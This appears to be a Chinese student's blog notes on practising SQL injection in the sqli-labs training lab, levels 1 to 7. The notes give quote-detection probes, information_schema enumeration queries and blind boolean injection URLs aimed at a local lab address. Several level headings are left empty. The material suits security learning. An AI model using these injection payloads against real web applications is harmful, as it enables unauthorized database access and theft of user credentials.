| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 大数据 -> SQL注入 -> 正文阅读 |
|
[大数据]SQL注入 |
1.总结第一天第二天的课程内容 1、数据传递采用注释
2、构造函数 如果是编码问题可以进行编码之后在传参
查询 整体思路:(web访问流程) 1、浏览器----本地页面代码(F12) 2、http----(页面的所有数据都要传的)截获数据、修改数据、观察数据、绕过页面判断的界面 3、web容器(iis、apache、Nginx)解析数据—解析文件、数据问题 4、web语言(php、javaScript、python、.net等等)执行代码 5、数据库 注入类漏洞---->数据变代码 1、如何判断漏洞 2、如何构造代码 思路:先判断是否被整型包裹(id=1 and 1=2),整体是对的会返回数据,错的不会返回数据,其次在看是不是单引号(id=1’)报错,进一步测试(id=1‘ and ‘1’='1)对的,(id=1‘ and ‘1’='2)没有数据,断定就是单引号包裹,取数据() 2.自己写一个登陆页面,并能实现对接数据库,判断用户名与密码是否正确。 1.登录页面
2、连接数据库
3.练习sql-map-master的1-7关。 1、第一关 思路:先判断是否被整型包裹(id=1 and 1=2),整体是对的会返回数据,错的不会返回数据,其次在看是不是单引号(id=1’)报错,进一步测试(id=1‘ and ‘1’='1)对的,(id=1‘ and ‘1’='2)没有数据,断定就是单引号包裹,取数据() 1、找库 show databases; select DATABASE();//看当前库 select name from users where id=1union all select 1,2;//联合查询输出了就说明两列不知道的话就尝试 select username, password from users order by 1;//order by函数也可以写相对位置
select table_name from information_schema.tables where table_schema=‘security’ limit 0,1;
select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1
select username,password from users
2、第二关
3、第三关
4、第四关 ") 5、第五关(不回写) ’ order by 3 select datbase() 按照流程走 select ascii(SUBSTR(‘abc’,2,1)); 写一个判断 A65 - 90 _95 a97 -122
需要写脚本 li-labs-master/Less-3/?id=1’ and length(database())=8–+ 长是8 http://192.168.131.129/sqli-labs-master/Less-3/?id=1’ and ascii(substr(database(),1,1))=115–+ 需要写脚本 6、第六关 ‘’ 7、第七关 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/24 14:39:16- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |